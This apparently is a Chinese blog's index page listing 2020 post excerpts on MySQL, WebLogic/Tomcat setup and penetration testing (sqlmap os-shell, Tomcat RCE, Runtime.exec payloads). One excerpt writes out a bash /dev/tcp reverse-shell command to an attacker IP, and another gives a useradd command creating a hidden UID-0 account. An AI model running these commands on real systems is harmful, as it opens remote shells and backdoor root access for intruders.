御用闲人

2020年5月11日

摘要：表结构及数据 DROP TABLE IF EXISTS `course`; CREATE TABLE `course` ( `name` varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci DEFAULT NULL, `course_nam 阅读全文

posted @ 2020-05-11 18:56 御用闲人阅读(1095) 评论(0) 推荐(0) 编辑

SQL语句‘order by’ 后面直接加数字的含义

摘要： select * from table order by n n 表示select里面的第n个字段，整段sql的意义是：查询出来的结果，按照第N个字段排序阅读全文

posted @ 2020-05-11 18:06 御用闲人阅读(2793) 评论(0) 推荐(0) 编辑

2020年5月9日

mysql写注释的几种方法

摘要： MySQL的注释风格总的来说有三种、它们分别是： 1、单行注释可以用"#" select 1 as cname; #this is a comment + + | cname | + + | 1 | + + -- (#后面直接根的就是注释) 2、单行注释的第二种写法用 "-- " 注意这个风格下" 阅读全文

posted @ 2020-05-09 15:07 御用闲人阅读(1877) 评论(0) 推荐(1) 编辑

2020年5月7日

中小型企业网络建设思路

摘要：欢迎探讨。阅读全文

posted @ 2020-05-07 18:26 御用闲人阅读(253) 评论(0) 推荐(0) 编辑

2020年4月10日

CVE-2017-12617 Tomcat 远程代码执行

摘要： 0×00前情提要 Apache Tomcat团队10月3日宣布，如果配置了默认servlet，则在9.0.1（Beta），8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操作系统上的潜在危险的远程执行代码（RCE）漏洞，CVE-2017-12617：远程代码执行漏洞。只阅读全文

posted @ 2020-04-10 16:20 御用闲人阅读(904) 评论(0) 推荐(0) 编辑

2020年4月9日

Linux下几种反弹Shell方法的总结---持续更新

摘要：方法一：（bash反弹）反弹shell命令如下： bash -i >& /dev/tcp/ip/port 0>&1 首先，使用nc在kali上监听端口： nc -lvp 7777 然后在目标机输入： bash -i >& /dev/tcp/192.168.0.30/4444 0>&1 可以看到sh 阅读全文

posted @ 2020-04-09 11:43 御用闲人阅读(4197) 评论(0) 推荐(0) 编辑

2020年4月8日

weblogic 10.3.6.0 静默启动

摘要：该版本启动时需要输入用户名和密码，这个问题可以使用如下方法解决： cd /home/weblogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer#创建文件夹 mkdir security#创建存储用户阅读全文

posted @ 2020-04-08 10:01 御用闲人阅读(448) 评论(0) 推荐(0) 编辑

2020年4月3日

centos7 安装 jboos as7.1

摘要：一、安装jdk环境：这里不再赘述，见https://www.cnblogs.com/yyxianren/p/10710089.html 注意：jboos7.1只兼容java1.7 及java1.6，使用不兼容的java会出现空指针报错。二、安装jboos 1、下载jboos https://jb 阅读全文

posted @ 2020-04-03 13:49 御用闲人阅读(412) 评论(0) 推荐(0) 编辑

CentOS7下Tomcat启动慢解决方案

摘要：主要原因是生成随机数的时候卡住了,导致tomcat启动不了。解决方案： vim $JAVA_HOME/jre/lib/security/java.security securerandom.source=file:/dev/random 改为 securerandom.source=file:/d 阅读全文

posted @ 2020-04-03 10:40 御用闲人阅读(316) 评论(0) 推荐(0) 编辑

2020年4月2日

解决weblogic启动慢和创建域慢的方法

摘要：创建域慢启动慢的特征：创建域到70%时，进程长时间等待（命令行创建时停止在100%处），创建域启动Weblogic的时候也是长时间停止。 Weblogic在Linux下启动慢的原因，发现从进程堆来看，线程挂在security相关的随机数生成上面，是由于JDK的Bug(JDK从/dev/random读阅读全文

posted @ 2020-04-02 18:19 御用闲人阅读(475) 评论(0) 推荐(0) 编辑

2020年3月26日

linux 一条命令创建root权限用户

摘要： [root@docker-test ~]# useradd -p "123456" toor -o -u 0 -g root 命令解析： -p 指定密码 -u 指定UID -g 指定用户组 -o 一般情况下除了root的uid为0，其他的用户不可以为0，所以需要-o来强制阅读全文

posted @ 2020-03-26 09:40 御用闲人阅读(2300) 评论(0) 推荐(0) 编辑

2020年3月16日

sqlmap os-shell的使用

摘要：很多的人会对os-shell的使用进行吐槽，这是得要多大的权限才能执行。是的，os-shell的执行条件有三个（1）网站必须是root权限（2）攻击者需要知道网站的绝对路径（3）GPC为off，php主动转义的功能关闭此处对于中小型企业，如果自己搭建的服务器，例如直接用wamp或者phpno 阅读全文

posted @ 2020-03-16 17:58 御用闲人阅读(1917) 评论(0) 推荐(0) 编辑

2020年3月11日

sqlmap绕过token保护

摘要： 1、演示页面 <?php session_start(); if(isset($_SESSION['token']) && isset($_POST['username'])){ if(empty($_POST['token']) || $_POST['token'] != $_SESSION['t 阅读全文

posted @ 2020-03-11 16:49 御用闲人阅读(2789) 评论(0) 推荐(0) 编辑

sqlmap指定位置注入

摘要：指定参数进行扫描，而不是扫描所有参数，这样可以避免浪费时间到非注入点参数上，从而提高扫描效率。比如扫描以下URL，已知Submit是静态参数，id是动态的，那么在扫描的时候只需要指定id就行了，指定多个参数时用双引号包起来，并以逗号分隔。也可以指定HTTP请求头中的参数，如User-Agent sq 阅读全文

posted @ 2020-03-11 14:09 御用闲人阅读(8107) 评论(0) 推荐(0) 编辑

java.lang.Runtime.exec() Payload

摘要：有时，通过Runtime.getRuntime().exec()执行命令的有效负载有时会失败。使用Web Shell，反序列化利用或通过其他媒介时，可能会发生这种情况。有时这是因为重定向和管道字符的使用在启动过程的上下文中没有意义。例如，在shell中执行ls> dir_listing会将当前目录阅读全文

posted @ 2020-03-11 13:43 御用闲人阅读(1343) 评论(0) 推荐(0) 编辑

公告